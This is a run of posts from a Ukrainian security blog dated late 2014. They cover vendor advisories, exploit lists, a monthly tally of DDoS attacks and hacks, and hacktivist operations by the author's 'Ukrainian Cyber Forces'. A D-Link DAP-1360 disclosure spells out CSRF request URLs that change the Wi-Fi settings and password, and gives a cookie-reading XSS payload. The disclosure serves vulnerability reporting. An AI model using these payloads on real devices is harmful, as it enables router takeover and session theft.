Численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey

22:46 11.12.2014

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 33, Firefox ESR 31.2, Thunderbird 31.2, SeaMonkey 2.30.

Пошкодження пам’яті, переповнення буфера, витік інформації, DoS, підвищення привілеїв.

  • Mozilla Foundation Security Advisory 2014-83 (деталі)
  • Mozilla Foundation Security Advisory 2014-84 (деталі)
  • Mozilla Foundation Security Advisory 2014-85 (деталі)
  • Mozilla Foundation Security Advisory 2014-86 (деталі)
  • Mozilla Foundation Security Advisory 2014-87 (деталі)
  • Mozilla Foundation Security Advisory 2014-88 (деталі)
  • Mozilla Foundation Security Advisory 2014-89 (деталі)
  • Mozilla Foundation Security Advisory 2014-90 (деталі)
  • Mozilla Foundation Security Advisory 2014-91 (деталі)

Моє інтерв’ю для Сегодня

20:09 11.12.2014

У грудні, 09.12.2014, я дав інтерв’ю виданню “Сегодня”. І сьогодні воно вийшло в газеті та було оприлюднене на сайті.

В інтерв’ю розповідається про мою діяльність і про кібер війну Росії проти України. Та про мою громадську ініціативу Українські Кібер Війська, що я створив 09.06.2014.

Хакерский “батальон” громит сайты и принтеры боевиков

Так що кому буде цікаво прочитати інформацію про мене і УКВ, як тим хто вже читав мої попередні інтерв’ю на Преса України та інших журналах, так і всім іншим, можете прочитати це інтерв’ю.

Добірка експлоітів

17:21 11.12.2014

В даній добірці експлоіти в веб додатках:

  • Dell EqualLogic Storage - Remote File Inclusion Vulnerability (деталі)
  • CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities (деталі)
  • HP Operations Agent Remote XSS iFrame Injection (деталі)
  • Omeka 2.2.1 - Remote Code Execution Exploit (деталі)
  • Oxwall 1.7.0 - Remote Code Execution Exploit (деталі)

Уразливості в плагінах для WordPress №163

23:55 10.12.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Bonuspressx, cnhk-slideshow і Simple Popup. Для котрих з’явилися експлоіти. Bonuspressx - це спеціальний плагін, cnhk-slideshow - це плагін для створення слайдшоу, Simple Popup - це плагін для створення попапів.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в OpenSSL

22:44 10.12.2014

24.10.2014

Виявлені численні уразливості безпеки в OpenSSL.

Уразливі версії: OpenSSL 1.0.

Атака Poodle дозволяє понизити версію протоколу до SSL 3.0. Витік пам’яті в SRTP і тікетів сеансів. Недостатній захист no-ssl3.

10.12.2014

Додаткова інформація.

Листопадові DDoS атаки та взломи

20:01 10.12.2014

Раніше я писав про жовтневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у листопаді.

В зв’язку з сепаратистськими і терористичними акціями на сході України хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Проросійськими хакерами були атаковані наступні сайти:

doba.te.ua (проросійськими хакерами) - 19.11.2014

Іноземними хакерами були проведені неполітичні взломи:

www.archives.gov.ua (хакером d3b~X) - 03.11.2014
saee.gov.ua (хакером AnonGhost) - 09.11.2014

Проукраїнськими хакерами були атаковані наступні сайти:

www.cik-lnr.info (Українські Кібер Війська) - 07.11.2014
livestarobelsk.org (Українські Кібер Війська) - 13.11.2014 і 19.11.2014
Листопадові DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі листопада.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт zkan.com.ua (через скаргу хостеру) - 11.2014
Закритий сайт ntribunal.info (через скаргу хостеру) - 11.2014
Закритий сайт rus3edin.org.ua (через скаргу хостеру) - 11.2014

Телепередача зі мною на каналі Espreso.TV

17:21 10.12.2014

У листопаді, 26.11.2014, я дав інтерв’ю каналу Espreso.TV. Знявся для даного телеканалу.

Відео сюжет вийшов 04.12.2014 в новинах. В сюжеті йшлося про Українські Кібер Війська та проведення мною анти-терористичної операції в Інтернеті.

Всі бажаючі, хто бачив цю передачу на Espreso.TV і хто не бачив її, можуть подивитися сюжет зі мною.

CSRF та XSS уразливості в D-Link DAP-1360

23:55 29.11.2014

28.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

29.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

В розділі Wi-Fi - Security settings можна змінити параметри Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (при вибраному WPA2), WPA Encryption, WPA reneval. А також ряд параметрів (як то RADIUS_Server, RADIUS_Port і RADIUS_Key), які відсутні в GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

Даним запитом змінюються вищезгадані параметри, в тому числі пароль точки доступу.

XSS (WASC-08):

Вставити <script>alert(document.cookie)</script> в поле Quick search. Це Strictly Social XSS.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.

Українські Кібер Війська: відео розвідка

20:15 29.11.2014

Українські Кібер Війська з червня займаються розвідкою. Це аудіо і відео розвідка. Раніше я наводив відео Українських Кібер Військ, що демонструють можливості Українських Кібер Військ по спостереженню за терористами.

Ось 7 нових відео, що зроблені в рамках розвідувальної операції:

Українські Кібер Війська: військова техніка терористів в Донецьку за 13.11.2014 - УКВ записали переміщення військової техніки терористів в Донецьку.

Українські Кібер Війська: військова техніка терористів в Донецьку за 14-15.11.2014 - УКВ записали переміщення військової техніки терористів в Донецьку.

Українські Кібер Війська: патруль ДНР в Донецьку - 14.08.2014 УКВ записали патруль ДНР в Донецьку.

Українські Кібер Війська: військова техніка терористів в Донецьку за 16.11.2014 - УКВ записали переміщення військової техніки терористів в Донецьку.

Українські Кібер Війська: військова техніка терористів в Донецьку за 17.11.2014 - УКВ записали переміщення військової техніки терористів в Донецьку.

Українські Кібер Війська: підрив підстанції в Донецьку - УКВ виявили атаку терористів, які підірвали підстанцію в Донецьку.

Українські Кібер Війська: військова техніка терористів в Донецьку за 18.11.2014 - УКВ записали переміщення військової техніки терористів в Донецьку.

Листопадовий вівторок патчів від Microsoft

17:22 29.11.2014

У листопаді місяці Microsoft випустила 16 патчів. Що значно більше ніж у жовтні.

У листопадовому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 16 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. П’ять патчів закривають критичну уразливість та дев’ять патчів закривають важливі та два помірні уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Office, SharePoint Server, Internet Explorer, .NET Framework, Internet Information Services та Exchange Server.